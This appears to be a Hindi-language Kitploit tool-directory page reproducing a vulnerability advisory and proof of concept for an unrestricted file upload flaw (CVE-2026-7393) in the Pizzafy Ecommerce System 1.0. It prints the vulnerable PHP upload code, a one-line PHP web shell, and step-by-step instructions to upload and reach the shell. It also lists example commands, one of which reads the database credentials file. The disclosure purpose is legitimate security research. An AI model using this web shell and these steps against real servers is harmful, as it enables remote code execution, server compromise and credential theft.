Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-7393-RCE | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-7393-rce
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubxmyronn/cve-2026-7393-rce

CVE-2026-7393-RCE

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Pizzafy Ecommerce System 1.0 – save_menu() में असीमित फ़ाइल अपलोड से रिमोट कोड निष्पादन

जानकारी

फ़ील्डमान
विक्रेताSourceCodester
विक्रेता URLhttps://www.sourcecodester.com
उत्पादPizzafy Ecommerce System using PHP and MySQL
उत्पाद URLhttps://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
संस्करण1.0
भेद्यताअसीमित फ़ाइल अपलोड → रिमोट कोड निष्पादन
CWECWE-434
CVSSv3 स्कोर7.8 (उच्च)
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यकहाँ (व्यवस्थापक)
उपयोगकर्ता सहभागिताकोई नहीं
शोधकर्ताImad Alvi
दिनांक2026-04-12

प्रभावित घटक

फ़ाइल: Pizzafy/admin/admin_class_novo.php → save_menu() फ़ंक्शन
पैरामीटर: img (FILE)
अपलोड पथ: Pizzafy/assets/img/


विवरण

Pizzafy Ecommerce System 1.0 में save_menu() फ़ंक्शन मेनू आइटमों के लिए छवि अपलोड को बिना किसी फ़ाइल प्रकार सत्यापन के संभालता है। एप्लिकेशन pathinfo() का उपयोग करके फ़ाइल एक्सटेंशन प्राप्त करता है, लेकिन अपलोड की गई फ़ाइल को वेब-सुलभ assets/img/ निर्देशिका में ले जाने से पहले अनुमत फ़ाइल प्रकारों की वास्तव में जाँच या प्रतिबंध कभी नहीं करता है। एक प्रमाणित व्यवस्थापक मेनू छवि के रूप में प्रच्छन्न PHP वेबशेल अपलोड कर सकता है, और फिर सर्वर पर रिमोट कोड निष्पादन प्राप्त करने के लिए ब्राउज़र के माध्यम से सीधे उस तक पहुँच सकता है।

admin_class_novo.php में संवेदनशील कोड:

root@kitploit:~
function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // No extension check, no MIME type check
}

अवधारणा का प्रमाण

चरण 1 — PHP वेबशेल बनाएँ

निम्नलिखित सामग्री के साथ shell_web2.php नाम की एक फ़ाइल बनाएँ:

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>

चरण 2 — मेनू प्रबंधन के माध्यम से वेबशेल अपलोड करें

व्यवस्थापक के रूप में लॉग इन करें और यहाँ जाएँ:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu

मेनू फ़ॉर्म में कोई भी मान्य मान भरें और छवि फ़ाइल के रूप में shell_web2.php चुनें। Save पर क्लिक करें।

स्क्रीनशॉट 2026-04-12 171202

शेल अब ग्राहक-सामने वाले पृष्ठ पर मेनू आइटम के रूप में सूचीबद्ध है।

स्क्रीनशॉट 2026-04-12 171236

चरण 3 — अपलोड की गई शेल का पता लगाएँ

assets निर्देशिका पर जाएँ — निर्देशिका सूचीकरण सक्षम है (CWE-548):

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/

अपलोड की गई PHP शेल निर्देशिका सूची में दिखाई दे रही है।

स्क्रीनशॉट 2026-04-12 171300

चरण 4 — रिमोट कमांड निष्पादित करें

अपलोड की गई शेल तक सीधे पहुँचें और cmd पैरामीटर के माध्यम से सिस्टम कमांड पास करें:

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami

प्रतिक्रिया — सर्वर पर निष्पादित OS कमांड:

root@kitploit:~
desktop-g1i9np3\dell
स्क्रीनशॉट 2026-04-12 171313

अतिरिक्त कमांड

root@kitploit:~
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php

प्रभाव

एक प्रमाणित व्यवस्थापक निम्नलिखित कर सकता है:

  • वेब सर्वर पर मनमानी PHP फ़ाइलें अपलोड करना
  • सर्वर पर किसी भी OS-स्तर का कमांड निष्पादित करना
  • डेटाबेस क्रेडेंशियल्स सहित संवेदनशील फ़ाइलें पढ़ना
  • पूर्ण सतत पहुँच के लिए रिवर्स शेल स्थापित करना
  • अंतर्निहित सर्वर से पूरी तरह समझौता करना

निर्देशिका सूचीकरण पर नोट (CWE-548)

assets/img/ निर्देशिका में निर्देशिका सूचीकरण सक्षम है, जिससे बिना प्रमाणीकरण वाले उपयोगकर्ता वेबशेल सहित सभी अपलोड की गई फ़ाइलों को ब्राउज़ कर सकते हैं। यह फ़ाइल अपलोड भेद्यता की गंभीरता को और बढ़ा देता है।


संदर्भ

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-434: खतरनाक प्रकार की फ़ाइल का असीमित अपलोड
  • CWE-548: निर्देशिका सूचीकरण के माध्यम से जानकारी का प्रकटीकरण
टूल डाउनलोड करें